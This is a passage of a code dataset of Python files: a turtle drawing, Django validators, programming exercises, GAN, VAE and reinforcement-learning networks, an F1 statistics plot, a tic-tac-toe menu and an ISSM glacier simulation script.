range(numSides):\n        if i % 2 == 0:\n            daniel.color(\"red\")\n        else:\n            daniel.color(\"green\") \n        daniel.forward(100) #Move forward 100 steps\n        daniel.right(360/numSides) #Turn 360/numSides degrees to the right\n\n    myWin.exitonclick() #Close the window when clicked\n    \nmain()\t\t\n","sub_path":"teaching/cmp/cis166/s14/blinkTurtle.py","file_name":"blinkTurtle.py","file_ext":"py","file_size_in_byte":572,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"628652124","text":"# coding=utf-8\nimport socket\nfrom django.core.exceptions import ValidationError\nfrom django.core.validators import URLValidator\n\n__author__ = 'cainli'\n\n\ndef validate_multiurl(value):\n    if not value:\n        urls = []\n    else:\n        urls = value.split('\\r\\n')\n    for url in urls:\n        try:\n            validator = URLValidator()\n            validator(url)\n        except ValidationError:\n            raise ValidationError(u'%s is invalid; please check the format and availability' % url)\n\n\ndef validate_host(value):\n    if value.startswith(\"http://\") or value.startswith(\"https://\"):\n        raise ValidationError(u'Please enter a bare domain name, without the http/https prefix')\n    try:\n        # ip = socket.gethostbyname(value)\n        result = socket.getaddrinfo(value, None)\n        ip = result[0][4]\n    except:\n        raise ValidationError(u'The domain cannot be used; please check the format and whether DNS resolution succeeds')\n\n    if ip != '120.24.183.207':\n        raise ValidationError(u'Please check the DNS configuration; the configured IP is wrong and should be 120.24.183.207')\n\n# get_ip_address('lo') internal network '127.0.0.1'\n# get_ip_address('eth0') external network '38.113.228.130'\n# def get_ip_address(ifname):\n#     s = 
socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\n# return socket.inet_ntoa(fcntl.ioctl(\n# s.fileno(),\n# 0x8915, # SIOCGIFADDR\n# struct.pack('256s', ifname[:15])\n# )[20:24])\n","sub_path":"wxms/validate.py","file_name":"validate.py","file_ext":"py","file_size_in_byte":1375,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"523926593","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\n'''\nnum = int(input())\ncontent = []\nfor i in range(num * 3):\n content.append(list(map(int,input().split())))\n\ndef get_li(li):\n i = 0\n narray = []\n for i in range(num):\n narray.append([])\n j = i * 3\n for j in range(j, j + 3):\n narray[i].append(li[j])\n return narray\n\ndef judge(li, u=1):\n for i in range(3):\n if li[i][0] == li[i][1] == li[i][2] == u:\n return True\n for i in range(3):\n if li[0][i] == li[1][i] == li[2][i] == u:\n return True\n if li[0][0] == li[1][1] == li[2][2] == u:\n return True\n if li[2][0] == li[1][1] == li[0][1] == u:\n return True\n return False\n\n\ndef space(li, u=0):\n count = 0\n for i in range(3):\n for j in range(3):\n if li[i][j] == u:\n count += 1\n return count\n\n\ndef dfs(li, u):\n max1, min1 = -10, 10\n if u==1 and judge(li, 2):\n return -space(li)-1\n if u==2 and judge(li, 1):\n return space(li)+1\n if (space(li) >= 7) or (space(li)==0): return 0\n \n for i in range(3):\n for j in range(3):\n if li[i][j] == 0:\n #lic = copy.deepcopy(li)\n li[i][j] = u\n if u==1:\n max1=max(max1,dfs(li, 2))\n else:\n min1=min(min1,dfs(li, 1))\n li[i][j]=0\n if u==1:\n return max1\n else:\n return min1\nfor i in get_li(content):\n if judge(i):\n print(space(i)+1)\n elif judge(i, 2):\n print(-space(i)-1)\n else:\n print(dfs(i, 1))\n\n\nimport dashtable\n\nf = ''\nl = dashtable.html2rst(f)\nprint l\n\n'''\n'''\n\n\nnum = int(input())\nn = num//10\n\ndef buy(n):\n if n == 0:\n return 0\n if n == 1:\n return 1\n if n == 2:\n return 2\n if n == 3:\n return 4\n if n == 4:\n return 5\n if n == 5:\n return 7\n x = 0\n if n>5:\n x = buy(n-5)+7\n return x\nprint(buy(n))\n\n\n\nN, k = list(map(int,input().split()))\n\ntecher = []\nfor i in range(k):\n techer.append(list(map(int, input().split())))\npub = list(range(1,N+1))\n\nstart_pub = []\nend_pub = []\n\nfor i in techer:\n start_pub.append([i[1],i[0]])\n end_pub.append([i[-1]+i[1],i[0]])\n\nstart_pub.sort()\nend_pub.sort()\n\ndef main():\n for i in range(N**2):\n while len(start_pub)>0 and start_pub[0][0]0:\n a = end_pub[0][1]\n end_pub.pop(0)\n pub[pub.index(0)] = a\n else:\n return pub\n\nprint(' '.join(map(str,main())))\n\n'''\nn = list(map(int,input().split()))\nn, m = n[0], n[1]\n\nall = ''\nfor i in range(n):\n all = all + input()\nfind = []\nfor i in range(m):\n find.append(input())\n\na = all.count(': ')\n\nwhile a != 0:\n all = all.replace(': ',':')\n a = all.count(': ')\n\ntry:\n d = eval(all)\nexcept:\n a = all.count(' ')\n while a != 0:\n all = all.replace(' ', '')\n a = all.count(' ')\nd = eval(all)\n\nfor i in find:\n i = i.split('.')\n b = len(i)\n if b == 0:\n x = d.get(i[0])\n if isinstance(x, str):\n print('STRING',x)\n elif isinstance(x, dict):\n print('OBJECT')\n else:\n print('NOTEXIST')\n else:\n x = d.get(i[0])\n for j in range(b-1):\n x = x.get(i[j+1])\n if isinstance(x, str):\n print('STRING',x)\n elif isinstance(x, dict):\n print('OBJECT')\n else:\n print('NOTEXIST')\n \n \n'''\n\n{\n\"firstName\": \"John\",\n\"lastName\": \"Smith\",\n\"address\": {\n\"streetAddress\": \"2ndStreet\",\n\"city\": \"NewYork\",\n\"a\": {\n\"d\": \"e\",\n\"f\": 
{\n\"d\": \"4\"\n}\n},\n\"state\": \"NY\"\n},\n\"esc\\\\aped\": \"\\\"hello\\\"\"\n}\nfirstName\naddress\naddress.city\naddress.postal\nesc\\aped\naddress.a.d\naddress.a.f\n'''\n","sub_path":"exercise/201808/26.py","file_name":"26.py","file_ext":"py","file_size_in_byte":3908,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"289067468","text":"import torch\nimport torch.nn as nn\n\nclass NetG(nn.Module):\n \"\"\"\n 生成器定义\n \"\"\"\n def __init__(self,opt):\n super(NetG, self).__init__()\n ngf = opt.ngf # 生成器feature map数\n\n self.main = nn.Sequential(\n # 输入是一个nz维度的噪声,我们可以认为它是一个nz*1*1的feature map\n nn.ConvTranspose2d(in_channels=opt.nz, out_channels=ngf * 8, kernel_size=4, stride=1, padding=0, bias=False),\n nn.BatchNorm2d(ngf * 8), #批 规范化 层\n nn.ReLU(True), # (True)会把输出直接覆盖到输入中\n # 上一步的输出形状:(ngf*8) x 4 x 4\n #nn.ConvTranspose2d(in_channels, out_channel, kernel_size, stride, padding,output_padding=, bias)\n # 逆卷积 卷积核 步长(扩大倍数) 输入填充(加边) 输出填边 添加偏离\n #out =output_padding + (in - 1 )* Stride - 2 * padding + kernel_size\n # 输入是一个nz维度的噪声,我们可以认为它是一个1*1*nz的feature map\n\n nn.ConvTranspose2d(ngf * 8, ngf * 4, 4, 2, 1, bias=False),\n nn.BatchNorm2d(ngf * 4),\n nn.ReLU(True),\n # 上一步的输出形状: (ngf*4) x 8 x 8\n\n nn.ConvTranspose2d(ngf * 4, ngf * 2, 4, 2, 1, bias=False),\n nn.BatchNorm2d(ngf * 2),\n nn.ReLU(True),\n # 上一步的输出形状: (ngf*2) x 16 x 16\n\n nn.ConvTranspose2d(ngf * 2, ngf, 4, 2, 1, bias=False),\n nn.BatchNorm2d(ngf),\n nn.ReLU(True),\n # 上一步的输出形状:(ngf) x 32 x 32\n\n nn.ConvTranspose2d(ngf, 3, 5, 3, 1, bias=False),\n nn.Tanh() # 输出范围 -1~1 故而采用Tanh\n # 输出形状:3 x 96 x 96\n )\n\n def forward(self, input):\n return self.main(input)\n\n\nclass NetD(nn.Module):\n \"\"\"\n 判别器定义\n \"\"\"\n\n def __init__(self, opt):\n super(NetD, self).__init__()\n ndf = opt.ndf\n\n self.main = nn.Sequential(\n # 输入 3 x 96 x 96\n nn.Conv2d(3, ndf, 5, 3, 1, bias=False),\n nn.LeakyReLU(0.2, inplace=True),\n nn.Dropout2d(0.25),\n # 输出 (ndf) x 32 x 32\n\n nn.Conv2d(ndf, ndf * 2, 4, 2, 1, bias=False),\n nn.LeakyReLU(0.2, inplace=True),\n nn.Dropout2d(0.25),\n nn.BatchNorm2d(ndf * 2, 0.8),\n # 输出 (ndf*2) x 16 x 16\n\n nn.Conv2d(ndf * 2, ndf * 4, 4, 2, 1, bias=False),\n nn.LeakyReLU(0.2, inplace=True),\n nn.Dropout2d(0.25),\n nn.BatchNorm2d(ndf * 4, 0.8),\n # 输出 (ndf*4) x 8 x 8\n\n nn.Conv2d(ndf * 4, ndf * 8, 4, 2, 1, bias=False),\n nn.LeakyReLU(0.2, inplace=True),\n nn.Dropout2d(0.25),\n nn.BatchNorm2d(ndf * 8, 0.8),\n # 输出 (ndf*8) x 4 x 4\n\n\n nn.Conv2d(ndf * 8, 1, 4, 1, 0, bias=False),\n\n nn.Sigmoid() # 输出一个数(概率)\n )\n def forward(self, input):\n return self.main(input).view(-1)\n\n","sub_path":"t1/model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":3093,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"170627107","text":"import torch\n\nimport math\n\nimport models\nimport dataset\n\n\nwith torch.no_grad():\n\n # state_dict = torch.load(\"src/experiment_checkpoints/21-01-12_19-26-27_Fashion_VAEWithVamp.pt\")\n state_dict = torch.load(\"src/experiment_checkpoints_without_time/MNIST_VAE.pt\")\n dataset_name = \"MNIST\"\n ds = dataset.load_test_dataset(dataset_name)\n dims = dataset.load_dims(dataset_name)\n # vae = models.VAEWithVampPrior(input_dims=dims, latent_dims=10, num_components=500)\n vae = models.VAE(input_dims=dims, latent_dims=40)\n vae.load_state_dict(state_dict)\n\n ll_per_point = vae.log_likelihood(ds, samples=100, batch_size=1000, use_cuda=True)\n average_ll = torch.logsumexp(ll_per_point, 
dim=0) - math.log(len(ds))\n print(average_ll)\n","sub_path":"src/likelihood.py","file_name":"likelihood.py","file_ext":"py","file_size_in_byte":748,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"542391339","text":"import matplotlib\nmatplotlib.use('TkAgg')\nimport matplotlib.pyplot as plt\nimport numpy as np\n\ndef get_average(numbers):\n step = 0\n race = 0\n while step != len(numbers) + 1:\n if step == 0:\n x = numbers[step]\n step += 2\n race += 1\n yield x\n if numbers[step-1] != 0:\n race += 1\n x = sum(numbers[:step]) / race\n step += 1\n yield x\n\nhome_name = [\n #2015\n 'AUS','MAL','CHN','BHR','ESP','MON','CAN','AUT','GBR',\n 'HUN','BEL','ITA','SIN','JPN','RUS','USA','MEX','BRA','ABU',\n #2016\n 'AUS','BHR','CHN','RUS','ESP','MON','CAN','EUR','AUT','GBR'\n]\n\nhome_ticks = [x for x in range(1, len(home_name) + 1)]\nplt.xticks(home_ticks, home_name)\n\nriccardo = [\n [6,4,7,7,10,4,9,18,10,4,5,19,2,7,10,3,5,19,5,8,5,2,5,3,1,4,2,5,4],\n [6,10,9,6,7,5,13,10,0,3,0,8,2,15,0,10,5,11,6,4,4,4,11,4,2,7,7,5,4]\n]\n\nverstappen = [\n [12,6,13,15,11,9,19,7,13,9,18,20,8,15,9,8,8,9,11,4,10,9,9,4,21,5,9,8,3],\n # DNF - AUS 2015\n [7,0,18,11,0,15,8,0,4,8,12,8,9,10,4,9,9,16,10,6,8,0,1,0,4,8,2,3]\n]\n\nsainz = [\n [8,15,14,9,9,20,11,12,8,12,19,17,14,12,20,20,11,19,10,7,11,8,11,8,6,15,18,15,7],\n [9,8,14,19,9,10,12,0,14,0,0,11,9,10,0,7,13,0,11,9,0,9,12,6,8,9,0,8,8]\n]\n\nkvyat = [\n [13,5,12,17,19,5,8,15,7,7,12,18,4,10,11,4,4,7,9,18,15,6,8,13,8,16,6,22,14],\n # DNF - AUS 2015\n [9,0,9,10,4,9,12,6,2,4,10,6,13,5,0,4,7,10,0,7,3,15,10,0,12,0,0,10]\n]\n\n#race\nplt.plot(home_ticks, np.array([x for x in get_average(riccardo[1])]), color='red')\nplt.plot(home_ticks[1:], np.array([x for x in get_average(verstappen[1])]), color='orange')\nplt.plot(home_ticks, np.array([x for x in get_average(sainz[1])]), color='green')\nplt.plot(home_ticks[1:], np.array([x for x in get_average(kvyat[1])]), color='purple')\n\n#quali\nplt.plot(home_ticks, np.array([x for x in get_average(riccardo[0])]), color='red', linestyle='dashed')\nplt.plot(home_ticks, np.array([x for x in get_average(verstappen[0])]), color='orange', linestyle='dashed')\nplt.plot(home_ticks, np.array([x for x in get_average(sainz[0])]), color='green', linestyle='dashed')\nplt.plot(home_ticks, np.array([x for x in get_average(kvyat[0])]), color='purple', linestyle='dashed')\n\n\nplt.axvline(x=1, color='gray', linestyle='dashed',\n label='pre-industrial', lw=1.5)\nplt.text(1.1,0.5,'2015')\nplt.axvline(x=20, color='gray', linestyle='dashed',\n label='pre-industrial', lw=1.5)\nplt.text(20.1,0.5,'2016')\n\nplt.axvline(x=24, color='gray', linestyle='dotted',\n label='pre-industrial', lw=1.5)\nplt.text(24.1,0.5,'KVY<->VES')\n\nplt.title('RedBull Racing drivers average position per clean race/qualification', fontsize=18)\nplt.legend(['Daniel Ricciardo', 'Max Verstappen', 'Carlos Sainz', 'Daniil Kvyat', 'Qualification'], loc='upper left')\nplt.xlabel('GP HOME')\nplt.ylabel('Average Position')\nplt.gca().invert_yaxis()\n\nplt.show()","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":2891,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"644380423","text":"#######################################################################\n# Copyright (C) 2017 Shangtong Zhang(zhangshangtong.cpp@gmail.com) #\n# Permission given to modify the code as long as you keep this #\n# declaration at the top 
#\n#######################################################################\n\nfrom .base_network import *\n\n# Network for CartPole with value based methods\nclass FCNet(nn.Module, VanillaNet):\n def __init__(self, dims, optimizer_fn=None, gpu=True):\n super(FCNet, self).__init__()\n self.fc1 = nn.Linear(dims[0], dims[1])\n self.fc2 = nn.Linear(dims[1], dims[2])\n self.fc3 = nn.Linear(dims[2], dims[3])\n BasicNet.__init__(self, optimizer_fn, gpu)\n\n def forward(self, x):\n x = self.to_torch_variable(x)\n x = x.view(x.size(0), -1)\n y = F.relu(self.fc1(x))\n y = F.relu(self.fc2(y))\n y = self.fc3(y)\n return y\n\n# Network for CartPole with dueling architecture\nclass DuelingFCNet(nn.Module, DuelingNet):\n def __init__(self, dims, optimizer_fn=None, gpu=True):\n super(DuelingFCNet, self).__init__()\n self.fc1 = nn.Linear(dims[0], dims[1])\n self.fc2 = nn.Linear(dims[1], dims[2])\n self.fc_value = nn.Linear(dims[2], 1)\n self.fc_advantage = nn.Linear(dims[2], dims[3])\n BasicNet.__init__(self, optimizer_fn, gpu)\n\n def forward(self, x):\n x = self.to_torch_variable(x)\n x = x.view(x.size(0), -1)\n y = F.relu(self.fc1(x))\n phi = F.relu(self.fc2(y))\n return phi\n\n# Network for CartPole with actor critic\nclass ActorCriticFCNet(nn.Module, ActorCriticNet):\n def __init__(self, state_dim, action_dim):\n super(ActorCriticFCNet, self).__init__()\n hidden_size1 = 50\n hidden_size2 = 200\n self.fc1 = nn.Linear(state_dim, hidden_size1)\n self.fc2 = nn.Linear(hidden_size1, hidden_size2)\n self.fc_actor = nn.Linear(hidden_size2, action_dim)\n self.fc_critic = nn.Linear(hidden_size2, 1)\n BasicNet.__init__(self, None, False)\n\n def forward(self, x, update_LSTM=True):\n x = self.to_torch_variable(x)\n x = x.view(x.size(0), -1)\n x = F.relu(self.fc1(x))\n phi = self.fc2(x)\n return phi\n\nclass FruitHRFCNet(nn.Module, VanillaNet):\n def __init__(self, state_dim, action_dim, head_weights, optimizer_fn=None, gpu=True):\n super(FruitHRFCNet, self).__init__()\n hidden_size = 250\n self.fc1 = nn.Linear(state_dim, hidden_size)\n self.fc2 = nn.ModuleList([nn.Linear(hidden_size, action_dim) for _ in head_weights])\n self.head_weights = head_weights\n BasicNet.__init__(self, optimizer_fn, gpu)\n\n def forward(self, x, heads_only):\n x = self.to_torch_variable(x)\n x = x.view(x.size(0), -1)\n x = F.relu(self.fc1(x))\n head_q = [fc(x) for fc in self.fc2]\n if not heads_only:\n q = [h * w for h, w in zip(head_q, self.head_weights)]\n q = torch.stack(q, dim=0)\n q = q.sum(0).squeeze(0)\n return q\n else:\n return head_q\n\n def predict(self, x, heads_only):\n return self.forward(x, heads_only)\n\nclass FruitMultiStatesFCNet(nn.Module, BasicNet):\n def __init__(self, state_dim, action_dim, head_weights, optimizer_fn=None, gpu=True):\n super(FruitMultiStatesFCNet, self).__init__()\n hidden_size = 250\n self.fc1 = nn.ModuleList([nn.Linear(state_dim, hidden_size) for _ in head_weights])\n self.fc2 = nn.ModuleList([nn.Linear(hidden_size, action_dim) for _ in head_weights])\n self.head_weights = head_weights\n self.state_dim = state_dim\n self.n_heads = head_weights.shape[0]\n BasicNet.__init__(self, optimizer_fn, gpu)\n\n def predict(self, x, merge):\n head_q = []\n for i in range(self.n_heads):\n q = self.to_torch_variable(x[:, i, :])\n q = self.fc1[i](q)\n q = F.relu(q)\n q = self.fc2[i](q)\n head_q.append(q)\n if merge:\n q = [q * w for q, w in zip(head_q, self.head_weights)]\n q = torch.stack(q, dim=0)\n q = q.sum(0).squeeze(0)\n return q\n return 
head_q\n","sub_path":"DeepRL/network/shallow_network.py","file_name":"shallow_network.py","file_ext":"py","file_size_in_byte":4280,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"326218498","text":"#! python\n\n\"\"\"\nGame: Tic-tac-toe.\n\"\"\"\n\nfrom txt_game.tic_tac_toe.settings import read_setting, save_settings, sm, input_set\nfrom txt_game.rendering import rend_menu, clr\nfrom txt_game.tic_tac_toe.game import run_game\nfrom txt_game.tic_tac_toe.statistics import show_stat\nimport keyboard\nimport threading\nimport time\n\n\nFPS = 5\n\nsettings = read_setting()\nmode = '1'\n# '1' - Comp VS Player;\n# '2' - Player 1 VS Player 2;\n\n\nmenu = [sm['main']]\nselected_point = 0\n\nlast_key = None\nexit_key = False\npause_key = False\nplay_key = False\n\n\ndef main():\n global play_key, exit_key, settings\n while True:\n if not pause_key:\n clr(rend_menu(menu[-1], settings, selected_point))\n time.sleep(1/FPS)\n keyboard.hook(check_pressed_keys)\n if exit_key:\n clr('Setting saved.\\nPowered by Efi-fi.')\n save_settings(settings)\n exit()\n if play_key:\n run_game(settings, mode)\n play_key = False\n\n\ndef key_down():\n global selected_point, menu\n if selected_point < len(menu[-1]) - 1:\n selected_point += 1\n else:\n selected_point = 0\n\n\ndef key_up():\n global selected_point, menu\n if selected_point > 0:\n selected_point -= 1\n else:\n selected_point = len(menu[-1]) - 1\n\n\ndef key_esc():\n global selected_point, menu, exit_key\n if len(menu) < 2:\n exit_key = True\n else:\n selected_point = 0\n menu.pop()\n\n\ndef check_pressed_keys(event):\n \"\"\"\n Check keys and performing actions according event.\n \"\"\"\n global selected_point, last_key, play_key, mode, settings, pause_key, fig\n if not last_key or (event.name != last_key.name) or (event.event_type == 'down' and last_key.event_type == 'up'):\n # processing events\n if event.name == 'down':\n key_down()\n elif event.name == 'up':\n key_up()\n elif event.name == 'esc':\n key_esc()\n elif event.name == 'space':\n # processing selected item\n if menu[-1][selected_point] == 'Exit':\n key_esc()\n elif menu[-1][selected_point] == 'Back':\n menu.pop()\n selected_point = 0\n elif menu[-1][selected_point].lower() in sm:\n menu.append(sm[menu[-1][selected_point].lower()])\n selected_point = 0\n elif menu[-1][selected_point] == 'One player':\n mode = '1'\n play_key = True\n elif menu[-1][selected_point] == 'Two players':\n mode = '2'\n play_key = True\n elif menu[-1][selected_point] == 'Statistics':\n pause_key = True\n clr()\n show_stat()\n input('Press Enter to continue ')\n pause_key = False\n else:\n pause_key = True\n input_set(settings, menu, selected_point)\n pause_key = False\n last_key = event\n keyboard.unhook_all()\n\n\nif __name__ == '__main__':\n main()\nelse:\n print('This module is not for import!')\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3117,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"510976007","text":"\"\"\"\nTime to compute using 5 processes on a Intel(R) Xeon(R) CPU E5-1620 v4 @ 3.50GHz\nis:\n\n FemModel initialization elapsed time: 0.636059\n Core solution elapsed time: 37978\n\n Total elapsed time: 10 hrs 32 min 58 sec\n\nwrite lock file:\n\n FemModel initialization elapsed time: 0.135978\n Core solution elapsed time: 134032\n\n Total elapsed time: 37 hrs 13 min 51 sec\nclosing PETSc\nclosing MPI\nloading results from cluster\nShelving variables to existing 
file './results/BP/shelf_bc_subelement_slip_fric_1e4_iceFront_dx_10000_wall_slip_dt_0.1.md'.\nVariable 'md' shelved.\n\n\"\"\"\n\n\n#from netCDF4 import Dataset\n#from fenics_viz import print_text, plot_variable\nimport issm as im\nimport numpy as np\nimport os\n\n# directories for saving data :\nmdl_odr = 'HO'\nlat_slip = True\nname = 'lateral_slip'\n\nif mdl_odr == 'HO': mdl_pfx = 'BP'\nelse: mdl_pfx = mdl_odr\nplt_dir = './images/' + mdl_pfx + '/' + name + '/'\nout_dir = './results/' + mdl_pfx + '/'\n\n# create the output directory if it does not exist :\nd = os.path.dirname(out_dir)\nif not os.path.exists(d):\n os.makedirs(d)\n\n# MISMIP+ experiment :\nmd = im.model()\nmd.miscellaneous.name = name\n\n#===============================================================================\n\n# define the geometry of the simulation :\nLx = 640000.0 # [m] domain length (along ice flow)\nLy = 80000.0 # [m] domain width (across ice flow)\ndx = 10000.0 # [m] element diameter \nnx = int(Lx/dx) # [--] number of x-coordinate divisions\nny = int(Ly/dx) # [--] number of y-coordinate divisions\nB0 = -150.0 # [m] bedrock topography at x = 0\nB2 = -728.8 # [m] second bedrock topography coefficient\nB4 = 343.91 # [m] third bedrock topography coefficient\nB6 = -50.57 # [m] second bedrock topography coefficient\nxbar = 300000.0 # [m] characteristic along-flow length scale of bedrock\nfc = 4000.0 # [m] characteristic width of channel walls\ndc = 500.0 # [m] depth of the trough compared to its walls\nwc = 24000.0 # [m] half width of the trough\nzd = -720.0 # [m] maximum depth of the bedrock topography\nthklim = 10.0 # [m] thickness limit\nrhow = 1028.0 # [kg m^-3] density of seawater\nrhoi = 918.0 # [kg m^-3] density of glacier ice\ng = 9.81 # [m s^2] gravitational acceleration\nspy = 31556926.0 # [s a^-1] seconds per year\nHini = 100.0 # [m] initial ice thickness\nTm = 273.15 # [K] melting temperature of ice\nn = 3.0 # [--] Glen's exponent\nA = 2e-17 # [Pa^{-n} s^{-1}] flow \nbeta = 1e4 # [Pa m^{-1/n} a^{-1/n}] friction coefficient\np = 3.0 # [--] Paterson friction exponent one\nq = 0.0 # [--] Paterson friction exponent two\nadot = 0.3 # [m a^{-a}] surface-mass balance\ntf = 1 # [a] final time\ndt = 1 # [a] time step\ndt_sav = 1 # [a] time interval to save data\ncfl = 0.5 # [--] CFL coefficient\nnum_p = 4 # [--] number of processor cores to use\n\n# create an empty rectangular mesh :\n#md = triangle(md, './exp/MismipDomain.exp', 10000)\nmd = im.squaremesh(md, Lx, Ly, nx=nx, ny=ny)\nmd = im.setmask(md, 'all', '')\n\n# set up element-wise multiplicative identities :\n\n# rank-zero tensor vertex ones vector :\nv_ones = np.ones(md.mesh.numberofvertices)\n\n# rank-zero tensor element ones vector :\ne_ones = np.ones(md.mesh.numberofelements)\n\n# rank-two tensor ones vector :\nA_ones = np.ones((md.mesh.numberofvertices, 6))\n\n# rank-one tensor ones vector :\nb_ones = np.ones((md.mesh.numberofvertices, 3))\n\n# interpolate the thickness data onto the mesh :\n#data = Dataset('data/weertman-A2.2e-17-ssa.nc', mode = 'r')\n#xd = np.array(data.variables['x'][:])\n#yd = np.array(data.variables['y'][:])\n#Hd = np.array(data.variables['thickness'][:])\n#H = im.InterpFromGridToMesh(xd, yd, Hd, md.mesh.x, md.mesh.y, thklim)[0]\nH = Hini * v_ones\n\n# eq'n (3)\nxt = md.mesh.x / xbar\n\n# eq'n (2) :\nBx = B0 + B2*xt**2 + B4*xt**4 + B6*xt**6\n\n# eq'n (4) :\nBy = + dc / (1 + np.exp(-2*(md.mesh.y - Ly/2 - wc) / fc)) \\\n + dc / (1 + np.exp( 2*(md.mesh.y - Ly/2 + wc) / fc))\n\n# lower topography (eq'n 1) :\nzb = np.maximum(Bx + By, 
zd*v_ones)\n\n# upper surface which does not take into account flotation :\nS = zb + H\n\n# grounded ice level-set flotation :\nls = H + rhow / rhoi * zb\n\n# get indicies of grounded (gnd) and floating (flt) ice :\ngnd = ls > 0\nflt = ls <= 0\n\n# ice is grounded where == 1 :\nmask = gnd.astype('int')\n\n# correct upper surface to be in equilibrium with the flotation height :\nS[flt] = H[flt] * (1 - rhoi / rhow)\n\n# lower surface :\nB = S - H;\n\n# specify rheology parameters :\nBf = (A / spy)**(-1/n)\n\n#===============================================================================\n# specify constants and varaibles used by MISMIP experiment :\n\nmd.materials.rho_ice = rhoi\nmd.materials.rho_water = rhow\nmd.constants.g = g\nmd.constants.yts = spy\nmd.geometry.surface = S\nmd.geometry.base = B\nmd.geometry.thickness = H\nmd.geometry.bed = zb\nmd.mask.groundedice_levelset = mask # ice is grounded where == 1\nmd.mask.ice_levelset = -1 * v_ones # ice is present when negative\n\n\nmd.friction.p = p * e_ones\nmd.friction.q = q * e_ones\nmd.friction.coefficient = beta * v_ones\nfloating_v = np.where(md.mask.groundedice_levelset < 0)[0]\n#md.friction.coefficient[floating_v] = 0\n\nmd.materials.rheology_B = Bf * v_ones\nmd.materials.rheology_n = n * e_ones\n#md.materials.rheology_B = im.paterson((Tm - 20.0) * v_ones)\nmd.materials.rheology_law = \"None\"\n\nmd.basalforcings.geothermalflux = 0.0 * v_ones\nmd.basalforcings.groundedice_melting_rate = 0.0 * v_ones\nmd.basalforcings.floatingice_melting_rate = 0.0 * v_ones\n\n# Set the default boundary conditions for an ice-sheet :\nmd = im.SetMarineIceSheetBC(md, './exp/mismip_front.exp')\n#md = im.SetIceShelfBC(md, './exp/mismip_front.exp')\n\n#md.stressbalance.referential = np.nan * A_ones\n#md.stressbalance.loadingforce = np.nan * b_ones\n\n# apply lateral slip on north, south, and west boundaries :\nif lat_slip: slip = np.nan\nelse: slip = 0.0\n\n# inflow boundary condition :\npos_w = np.where(md.mesh.x < 0.1)[0]\nmd.stressbalance.spcvx[pos_w] = 0.0\nmd.stressbalance.spcvy[pos_w] = slip\nmd.stressbalance.spcvz[pos_w] = slip\n\n# north wall :\npos_n = np.where(md.mesh.y > np.max(md.mesh.y) - 0.1)[0]\nmd.stressbalance.spcvx[pos_n] = slip \nmd.stressbalance.spcvy[pos_n] = 0.0\nmd.stressbalance.spcvz[pos_n] = slip\n\n# south wall :\npos_s = np.where(md.mesh.y < 0.1)[0]\nmd.stressbalance.spcvx[pos_s] = slip\nmd.stressbalance.spcvy[pos_s] = 0.0\nmd.stressbalance.spcvz[pos_s] = slip\n\n# go back and ensure that the west corners have zero x-component velocity :\nmd.stressbalance.spcvx[pos_w] = 0.0\n\nmd.smb.mass_balance = adot * v_ones\n#md.thermal.spctemperature = np.nan * v_ones\n\n#md.groundingline.migration = 'SoftMigration'\nmd.groundingline.migration = 'SubelementMigration'\n#md.groundingline.migration = 'SubelementMigration2'\n#md.groundingline.migration = 'AggressiveMigration'\n#md.groundingline.migration = 'None'\nmd.masstransport.hydrostatic_adjustment = 'Incremental'\nmd.masstransport.spcthickness = np.nan * v_ones\nmd.masstransport.stabilization = 1\n\n# initialization :\nmd.initialization.vx = 0.0 * v_ones\nmd.initialization.vy = 0.0 * v_ones\nmd.initialization.vz = 0.0 * v_ones\nmd.initialization.vel = 0.0 * v_ones\nmd.initialization.pressure = rhoi * g * H\nmd.initialization.temperature = Tm * v_ones\n\n# tansient settings :\nmd.transient.isstressbalance = 1\nmd.transient.isgroundingline = 1\nmd.transient.ismasstransport = 1\nmd.transient.issmb = 1\nmd.transient.isthermal = 0\nmd.timestepping.time_adapt = 
0\nmd.timestepping.cfl_coefficient = cfl\nmd.timestepping.time_step = dt\nmd.timestepping.final_time = tf\nmd.settings.output_frequency = int(dt_sav/dt)\n\nmd.transient.requested_outputs = ['default',\n 'GroundedArea',\n 'FloatingArea',\n 'IceVolume',\n 'IceVolumeAboveFloatation']\n\n# now, extrude and set the basal boundary conditions :\nmd.extrude(6, 1.0)\n\n# specifiy the flow equation and FE basis :\nmd = im.setflowequation(md, mdl_odr, 'all')\nmd.flowequation.fe_HO = 'P1'\n\n## set no-slip basal velocity BC :\n## FIXME: if you do not call ``md.extrude()`` before, ``md.mesh.vertexonbase``\n## does not exist.\n#basal_v = md.mesh.vertexonbase\n#md.stressbalance.spcvx[basal_v] = 0.0\n#md.stressbalance.spcvy[basal_v] = 0.0\n#md.stressbalance.spcvz[basal_v] = 0.0\n\n\n#===============================================================================\n# save the state of the model :\nim.savevars(out_dir + 'mismip_init.md', 'md', md)\n\n#===============================================================================\n# solve :\n\n## initialize the velocity for the CFL condition:\n#md.cluster = im.generic('name', im.gethostname(), 'np', 2)\n#md.verbose = im.verbose('solution', True, 'convergence', True)\n#md = im.solve(md, 'Stressbalance')\n#\n#md.initialization.vx = md.results.StressbalanceSolution.Vx\n#md.initialization.vy = md.results.StressbalanceSolution.Vy\n#md.initialization.vz = md.results.StressbalanceSolution.Vz\n#md.initialization.vel = md.results.StressbalanceSolution.Vel\n\n# solve the transient :\n#md.cluster = im.ollie('name', im.gethostname(), 'np', num_p)\nmd.cluster = im.ollie('name', name, 'np', num_p, 'login', 'ecumming')\nmd.verbose = im.verbose('solution', True, 'control', True, 'convergence', True)\nmd = im.solve(md, 